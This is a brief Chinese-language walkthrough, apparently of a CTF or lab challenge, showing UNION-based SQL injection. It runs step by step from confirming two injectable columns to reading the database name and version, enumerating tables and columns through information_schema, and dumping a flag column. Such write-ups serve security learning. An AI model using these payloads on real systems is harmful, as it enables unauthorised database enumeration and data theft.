1. 输入一个1,发现有两个注入点
2. 验证这两个注入点
0 union select 1,2
3. 从注入点得到数据库信息和数据库版本
0 union select database(),version()
4. 查询sqli数据库中的表
0 union select 1,group_concat(table_name) from
information_schema.tables where table_schema='sqli'
5. 查询表中的字段
0 union select 1,group_concat(column_name) from
information_schema.columns where table_name='qvqmmbwmch'
6. 查询对应字段的值
0 union select 1,group_concat(aosteiqvkp) from qvqmmbwmch